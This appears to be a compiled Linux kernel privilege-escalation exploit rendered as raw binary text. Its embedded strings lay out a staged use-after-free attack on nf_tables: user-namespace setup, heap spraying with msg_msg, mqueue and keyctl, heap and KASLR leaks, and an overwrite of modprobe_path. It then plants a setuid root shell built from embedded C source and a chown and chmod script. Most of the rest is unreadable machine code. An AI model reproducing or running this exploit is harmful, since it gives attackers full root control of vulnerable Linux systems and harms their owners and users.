ELF>#@@8 @@@@ ##PPPm}}0xm}}888@@xxx Std888@@Ptd[[[,,QtdRtdm}}PP/lib64/ld-linux-x86-64.so.20GNUGNU??A(emfUa9:kf |-3n0[WF!)N '&`8^Lr , u"_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTablemnl_nlmsg_batch_headmnl_socket_openmnl_nlmsg_batch_startmnl_nlmsg_batch_sizemnl_nlmsg_batch_currentmnl_socket_sendtomnl_nlmsg_batch_nextnftnl_set_freenftnl_table_nlmsg_build_payloadnftnl_batch_endnftnl_set_add_exprnftnl_expr_allocnftnl_nlmsg_build_hdrnftnl_table_allocnftnl_batch_beginnftnl_set_nlmsg_build_payloadnftnl_set_set_u32nftnl_set_allocnftnl_table_set_u32nftnl_expr_set_u32nftnl_set_set_strnftnl_table_set_strnftnl_expr_set_str__cxa_finalizereadmallocwritegetpid__libc_start_mainmq_receivememsetsetvbufstrncmpgetuidstdoutputssystemmq_openmsgsndclosegetgidstrlensleepmq_sendsysconfexecvestdinsyscallsnprintfforkstderrmemcpysched_setaffinityperrorexitunshare__stack_chk_failcallocmmaplibmnl.so.0libnftnl.so.11libc.so.6LIBMNL_1.0LIBNFTNL_16LIBNFTNL_11GLIBC_2.14GLIBC_2.3.4GLIBC_2.4GLIBC_2.34GLIBC_2.2.5 5 `/5ZA0f ea qP }ti ii ui }$}$؁؁(<@?AB (0 8 @ H P X`hpxȀЀ؀ !"#$%& '()0*8+@,H-P.X/`0h1p2x3456789:;=ȁ>HH_HtH5_%_@%_h%_h%_h%_h%_h%_h%_h%_hp%_h`%_h P%z_h @%r_h 0%j_h %b_h %Z_h%R_h%J_h%B_h%:_h%2_h%*_h%"_h%_h%_hp% _h`%_hP%^h@%^h0%^h %^h%^h%^h%^h %^h!%^h"%^h#%^h$%^h%%^h&%^h'p%^h(`%^h)P%z^h*@%r^h+0%j^h, %b^h-%Z^h.%R^h/%J^h0%B^h1%:^h2%2^h3%*^h4%"^h5%^h6%^h7p% ^h8`%^h9P% \f1I^HHPTE11H=[f.@H=]H]H9tH[Ht H=]H5]H)HH?HHHtHm[HtfD=]u/UH=N[Ht H=:]-hY]]{UHH0H}HuHUHMDE܋}HuHMHUHEAIHƿdUHH0}HuHUHMLEH}HuHMHUEIIƿUHHH}HEH#UHHH}HEHUHHH}HuHUHEHHǸUHSHX}udH%(HE1EHNHEH}uH;+HIEEUHEH+(HǸGHEHHEHHEHHUHEAHH*HJEHHEHЋyH*HEUE9E^HEHUdH+%(t_H]UHSHh}HuHUHMdH%(HE1EH2HEHEHEHEHHUHHEHH '*HH8HEHHUHH}uH)H EeEHHEHHUHEA HH)HEHHEHЋyH)HEE;ErHEHUdH+%(t5H]UHSH\HPHHH@L8L0dH%(HE1\HHhHPHHHwrHH )HH(HHHHEHEHH@HHEHH8HHEHH0HHEH HUHH(H`DždHUHp(HǸ_dHHhHHPHUHEAHH'HddHHhHЋyH'Hdd;\[HhHUdH+%(tlH]UHH0HdH%(HE1HHDžHH HHȋHAHƿ yH6'HHHH 'HHu7HHHoWHhWHH&HǸ=HHH&HǸ;HUdH+%(tUHH0HdH%(HE1HHNHH HHȋHAHƿqHEdH+%(txUHH H}uEKEHHEHЋHAHƿ HyH%H^EE;ErHEHUHHH}uEHHHEHЋHAHƿHyHv%HUHH0dH%(HE1PHE%HǸhH 5%HΉH%HǸ HH%HǸ2HHHHHΉILH$HǸHH$HǸHH&HHHΉHEdH+%(tUHAUATSHHhH`dH%(HE1HIH`HHDžƅDžHHHHTHHHH#HHHHHHHkHHHHPH¾HrDžH=H @HAHHʸHHлHHkH)HHHHHHHpHDžPHHHHHPAHHEھHHHHHHHHlPAHH4Eھ H-HHHHHmHHHHPHHHeHHHhuH HƿCHHH HǸHHFHHHHHhHHHHyH HƿLHEdH+%(t&He[A\A]]UHAUATSHxHHHxdH%(HE1HIHHƅDžDž#HHHHHxHHHHHHHHHHHHHcHHHHHHHHHHHHHwH=H @HAHHʸHHлHHkH)HHHHHHH(HDžPHHHHHPAHHfEھ H_HHHHHHH0HH!PHHHHHHuH)HƿuHHHHHTHHHHHHyHHƿHHLHEdH+%(tgHe[A\A]]UHH\XdH%(HE1HpHƸHHH\HHhHhwMHhHHHpHHHh?HHH4HpHH HHpXWyHCHHEdH+%(toUHH@HdH%(HE1DžDžDžHHsDž;HѺ(tHH;|HEdH+%(tUHH0dH%(HE1DžH]HDžH;HtgHHH-QHIHIH HIHIHHHǸ,HIHHHǸ;\HUdH+%(tUHH0dH%(HE1DžHPHDž%H1;|͸HUdH+%(tUHH0 dH%(HE1HHHHHH0HHAHDžruHHǸ0H^uHH:p;rHEdH+%(tUHH}HuHUEƿUHSH(}HuHEHEHHHEHx1HCHEHHHEHH@HuHHHEHHHEHH@xHHEHHHEHH@HUHHHUHHƿ HEHHHEHЋyHXHHEEH9EHEH]UHH H}uEEHHHEHЋEE;ErHEHfUHHH}uEHHHEHЋUH R]UHHBHHǸEEH HΉjEpUHHBHHǸEEH HΉE!HHUHH0dH%(HE1HEHEHHǸ?EHMEغHΉE؉HEHHHǸ1HEBHǸE܃}yHHEܺ?H HΉ5E܉;HEdH+%(tUH]UHH}HEu]UHH}HE]UHH}HE]UHSH%HH!Htmp/H>HHƿ}HpHPHy$DžHHH`HHH~HH/tmp/shell.c/tmp/dummy#include #include #include int main(int argc, char **argv){if (geteuid() == 0){setuid(0);setgid(0);puts("[+] I am root");system("bash");}}#!/bin/bash chown root:root /tmp/shell chmod 4555 /tmp/shell callocSPRAY-RING-%03duuseradd_key12341234add_key - assert(len <= 0x28)%7Ikeyctl[+] leak successed, kmalloc-64 heap: 0x%llx [-] leak failed, idkval: %s keyctl(KEYCTL_REVOKE)/proc/self/setgroupsdeny/proc/self/uid_map0 %d 1/proc/self/gid_mapset_stablemnl_socket_open[+] setting stable %s and set mnl_socket_sendlookup[+] triggering UAF set and overwrite *(prevchunk+0x18)sched_setaffinity[*] spraying mqueue...err: mq_send[*] gathering mqueue...[+] KASLR base: 0x%llx [+] modprobe addr: 0x%llx [*] try to spray msg_msg[*] spraying msg_msg: 0x%x msgsend failuremallocio_uring_creategcc -o /tmp/shell /tmp/shell.c -w/proc/sys/kernel/modprobe[*] current modprobe name: %s open [------------------------- stage 4: Execute Malicious File -------------------------------]/tmp/dummy/tmp/shellMQUEUE [------------------------- stage 0: Allocate stable table and set ------------------------]table1table2table3table4 [------------------------- stage 1: Leak heap address ------------------------------------]set_trigger0set_trigger1[-] leak failed... [------------------------- stage 2: Leak KASLR address -----------------------------------]set_trigger2TESTMSGTESTMSGTESTMSGTESTMSGTESTMSGset_trigger3 [------------------------- stage 3: Overwrite modprobe_path ------------------------------]set_trigger4set_trigger5/qname1/qname2/qname3/qname4/qname5;,$@xH.u0Pt!BT<8\5 O,lLl40Pp zRx "zRx $FJ w?;*3$"DH\%IAC D |NGAC B u"AC {"AC +AC f  AC E   {*AC E   <AC H `&XAC S ^AC  zAC u 0[AC V kAC  $AC L $(AC L P@AC  pAC   AC  AC  AC  )AC d  ! AC E 4MAC H T5,AC g tAAC V